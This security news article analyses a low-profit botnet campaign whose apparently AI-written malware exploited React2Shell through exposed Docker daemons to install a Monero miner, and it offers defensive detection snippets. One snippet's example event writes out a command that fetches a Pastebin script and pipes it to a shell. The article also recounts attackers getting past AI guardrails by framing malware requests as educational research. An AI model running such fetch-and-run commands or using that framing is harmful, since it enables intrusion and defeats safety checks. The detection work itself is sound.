AI cybersecurity company Darktrace recently observed a botnet incident involving 91 compromised hosts that netted the threat actors just five British pounds. Darktrace’s global honeypot network, CloudyPots, captured a completely AI-generated malware sample exploiting the React2Shell vulnerability. The significance of the discovery lies not in the damage done, but in the method of creation: the malware was written entirely by AI, and it was effective. The use of AI-assisted software development, known as vibe coding, is on the rise in offensive cyber operations.
Anatomy of the AI-Built Exploit
The observed attack unfolded in several stages, with CloudyPots’ intentionally exposed Docker daemons serving as the initial access vector. The attacker spawned a container named “python-metrics-collector” whose startup command installed prerequisite tools. The payload chain continued with a Pastebin-hosted dependency list, followed by a Python script fetched from a shortened URL that redirected to a GitHub Gist hosted by “hackedyoulol,” a user who has since been banned from GitHub. Darktrace notes that the payload script lacked a Docker spreader, suggesting a separate, centrally managed spreading mechanism, possibly run from the attacker’s home computer.
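The staged delivery described above leaves detectable fingerprints at container-creation time. The sketch below is a minimal, illustrative heuristic for flagging container startup commands that pipe remote downloads into a shell or pull from paste/shortener services; the indicator lists, function name, and example event are all assumptions for illustration, not Darktrace's detection logic.

```python
# Illustrative heuristic: flag container-creation requests whose startup
# command fetches and executes remote payloads, as seen in this campaign.
# The indicator lists below are examples, not a complete ruleset.

SUSPICIOUS_FETCHERS = ("curl", "wget")
SUSPICIOUS_HOSTS = ("pastebin.com", "gist.github.com", "bit.ly")

def is_suspicious_container(name: str, command: str) -> bool:
    """Return True if the startup command pipes a remote download into a
    shell, or pulls from paste/shortener services often used for staging."""
    cmd = command.lower()
    fetches = any(tool in cmd for tool in SUSPICIOUS_FETCHERS)
    pipes_to_shell = "| sh" in cmd or "| bash" in cmd or "|sh" in cmd
    shady_host = any(host in cmd for host in SUSPICIOUS_HOSTS)
    return (fetches and pipes_to_shell) or shady_host

# Hypothetical event resembling the observed attack:
evt = ("python-metrics-collector",
       "sh -c 'apk add curl python3 && curl -sL https://pastebin.com/raw/XXXX | sh'")
print(is_suspicious_container(*evt))  # True
```

In practice, such a check would run against Docker daemon audit events rather than static strings, but the same pattern (remote fetch piped to a shell from a throwaway hosting service) is what gives staged payloads away.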
The exploit mechanism took advantage of CVE-2025-55182, also known as React2Shell, a remote code execution flaw in React Server Components (RSC). Threat actors craft Next.js server component payloads that force exceptions to reveal command output by invoking the child_process Node.js module, enabling arbitrary command execution on the target server. The end result of the observed attack was the deployment of an XMRig cryptocurrency miner configured with a Monero wallet and the supportxmr mining pool.
The Smoking Gun—How We Know AI Wrote It
The malicious code in this incident contains ample evidence that it was composed by AI. The script features verbose commentary with multi-line docstrings and thorough inline comments, hallmarks of LLM output that stand out as anomalous in malware, where obfuscation is the norm. The specific inclusion of the phrase “Educational/Research Purpose Only” points to jailbreak prompting intended to bypass AI safety guardrails.
AI detection analysis by GPTZero flagged the code as likely AI-generated with moderate confidence (76% chance). Structural elements in the script differentiate it from common patterns of human-written code. The coding style favored by LLMs is documentation-heavy and methodical with clean structure, contrasting with typical human-written malware, which prioritizes speed, is deliberately obfuscated, and contains sparse comments.
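The stylistic tells described above can be approximated crudely in code. The sketch below is an illustrative comment-density metric, not GPTZero's method: it simply measures what fraction of a script's non-blank lines are comments or docstring lines, on the assumption that heavily annotated malware is the anomaly. The threshold and function name are arbitrary examples.

```python
# Crude illustrative metric for the "documentation-heavy" tell: AI-generated
# scripts tend toward dense docstrings and comments, while human-written
# malware is typically sparse or obfuscated. Not a calibrated classifier.

def comment_density(source: str) -> float:
    """Fraction of non-blank lines that are comments or docstring lines."""
    lines = [ln.strip() for ln in source.splitlines() if ln.strip()]
    if not lines:
        return 0.0
    in_doc = False
    annotated = 0
    for line in lines:
        if in_doc:
            annotated += 1
            # A line with an odd number of triple quotes closes the docstring.
            if line.count('"""') % 2 == 1 or line.count("'''") % 2 == 1:
                in_doc = False
        elif line.startswith("#"):
            annotated += 1
        elif line.startswith('"""') or line.startswith("'''"):
            annotated += 1
            if line.count('"""') % 2 == 1 or line.count("'''") % 2 == 1:
                in_doc = True
    return annotated / len(lines)
```

A density well above typical hand-written malware (which often sits near zero) would be one weak signal among many; real AI-authorship detectors combine far richer stylometric features.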
The Democratization of Cybercrime
This attack campaign is indicative of major trends in the threat landscape. The use of LLMs in cyberattacks has collapsed skill barriers and compressed what once required months of expertise into mere minutes of prompting. AI-assisted attacks have a near-zero marginal cost of generating malware while providing the ability to iterate, customize, and deploy at conversational speed. Framing malicious requests as being for “educational” or “research” purposes enables attackers to bypass AI safety measures, exposing a systemic weakness in generative AI tools.
The shift from high-skill, high-value targeted attacks to high-volume, low-effort campaigns demonstrates the cybercrime landscape trending toward profit through sheer scale rather than sophistication. This attack should be taken as a preview of what’s to come with cyberthreats: Darktrace warns that threat actors are now able to “generate custom malware on demand, modify exploits instantly, and automate every stage of compromise.”
It is vital for enterprises to look at this campaign as a sign of attacks to come, as cyberthreat tactics continue to evolve. “From an organizational perspective, the key takeaway is that AI is fundamentally changing the economics of cybercrime,” says Chrissa Constantine, Senior Cybersecurity Solution Architect at Black Duck. “The focus is no longer solely on highly skilled, well-funded threat groups. Instead, defenders must assume that opportunistic actors can quickly assemble sophisticated tooling using publicly available models and infrastructure.”
Outpacing AI-Armed Adversaries
The evolution of attacker methods presents serious challenges for defenders. Traditional signature-based detection falls short against AI-generated malware that can be regenerated with different signatures on demand, defeating hash-based and pattern-matching defenses. Behavioral detection is the new baseline: monitoring for anomalous behaviors, such as unusual container creation or unexpected outbound connections to mining pools, is now essential.
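The mining-pool indicator mentioned above is one of the simplest behavioral checks to implement. The sketch below is a minimal example assuming flow telemetry is available as (source, destination, port) tuples; the pool list, stratum ports, and function name are illustrative assumptions, and a real deployment would draw on threat-intelligence feeds.

```python
# Illustrative behavioral check: flag outbound connections matching
# cryptomining indicators. Domain and port lists are example values.

KNOWN_POOL_DOMAINS = {"pool.supportxmr.com", "xmr.nanopool.org"}
STRATUM_PORTS = {3333, 5555, 7777}  # ports commonly used by stratum miners

def flag_mining_connections(events):
    """events: iterable of (src_host, dst_domain, dst_port) tuples.
    Returns the subset matching mining-pool indicators."""
    hits = []
    for src, dst, port in events:
        if dst in KNOWN_POOL_DOMAINS or port in STRATUM_PORTS:
            hits.append((src, dst, port))
    return hits

events = [("web01", "pool.supportxmr.com", 3333),
          ("web01", "example.com", 443)]
print(flag_mining_connections(events))
```

Signature-agnostic checks like this survive malware regeneration: however the miner binary mutates, it still has to phone home to a pool.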
The React2Shell vulnerability was exploited within hours of disclosure, emphasizing the importance of rapid patching as the window between CVE publication and active exploitation continues to shrink. This attack also highlights the need for continuous attack surface management: exposed Docker daemons, misconfigured APIs, and internet-facing infrastructure are low-hanging fruit that attackers armed with AI will target first. An emerging paradigm is taking shape in which AI-powered defensive tools become imperative to match the speed and adaptability of AI-powered offensive tools.
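The "low-hanging fruit" called out above can be triaged from an ordinary port inventory. The following is a minimal sketch assuming scan results are available as a host-to-ports mapping; the service descriptions and function name are illustrative (2375 is Docker's default unencrypted API port, 2376 its TLS counterpart).

```python
# Illustrative attack-surface triage: flag internet-facing hosts exposing
# high-risk management services. Mappings are common defaults, used as
# examples rather than a complete exposure catalog.

RISKY_SERVICES = {
    2375: "Docker daemon (unauthenticated REST API)",
    2376: "Docker daemon (TLS; verify client certificate auth)",
    6443: "Kubernetes API server",
}

def triage_exposure(inventory):
    """inventory: dict mapping host -> set of open ports.
    Returns a list of (host, port, description) findings."""
    findings = []
    for host, ports in inventory.items():
        for port in sorted(ports):
            if port in RISKY_SERVICES:
                findings.append((host, port, RISKY_SERVICES[port]))
    return findings

print(triage_exposure({"10.0.0.5": {22, 2375}, "10.0.0.6": {443}}))
```

Run continuously against fresh scan data, a check like this would have flagged exactly the exposed Docker daemons that served as this campaign's entry point.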
The Attacker Profile
The breakdown of the attack provides insight into the perpetrator’s environment and capabilities. The attack’s source IP address is registered to a residential ISP in India, suggesting either a low-sophistication operator or residential proxy use. The persona behind the now-banned GitHub handle “hackedyoulol” reinforces the profile of an amateur actor.
The attacker’s use of Monero also inadvertently exposed the scope and profitability of the campaign, as the supportxmr mining pool publishes transparent per-wallet statistics despite Monero’s opaque blockchain. This campaign exemplifies a new and rising archetype in cybercrime: the “AI-augmented script kiddie,” with low technical skill and high operational output enabled entirely by LLM assistance.
The Five-Pound Warning
While this campaign was only trivially profitable, it is profoundly significant as an indicator of threat trends. Far from an isolated incident, the attack serves as a harbinger of AI-generated malware continuing to grow in sophistication, volume, and impact. It is crucial for CISOs and SOC leaders to prioritize rapid patching, behavioral detection, and attack surface reduction, treating AI-generated threats as a present reality, not a theoretical concern. The next attacker won’t walk away with just £5; they’ll have learned from this campaign.